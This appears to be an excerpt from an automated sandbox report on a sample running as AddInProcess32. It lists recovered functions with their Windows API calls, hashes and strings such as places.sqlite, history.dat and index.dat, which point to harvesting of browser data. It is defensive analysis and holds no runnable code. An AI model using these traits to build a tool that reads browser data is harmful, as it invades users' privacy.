                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1979745280-0
                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                  • API String ID: 2641622041-467022611
                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 839530781-0
                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID: *.*$index.dat
                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1156039329-0
                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 3397143404-0
                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1125800050-0
                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                  Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                  • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleSleep
                                                                                                  • String ID: }A
                                                                                                  • API String ID: 252777609-2138825249
                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                  Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: freemallocmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3056473165-0
                                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                  Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: d
                                                                                                  • API String ID: 0-2564639436
                                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID: BINARY
                                                                                                  • API String ID: 2221118986-907554435
                                                                                                  • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                  • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: /stext
                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2445788494-0
                                                                                                  • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                  • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                  Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3150196962-0
                                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: malloc
                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1065087418-0
                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                  Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1381354015-0
                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                  Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2154303073-0
                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                  Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3150196962-0
                                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
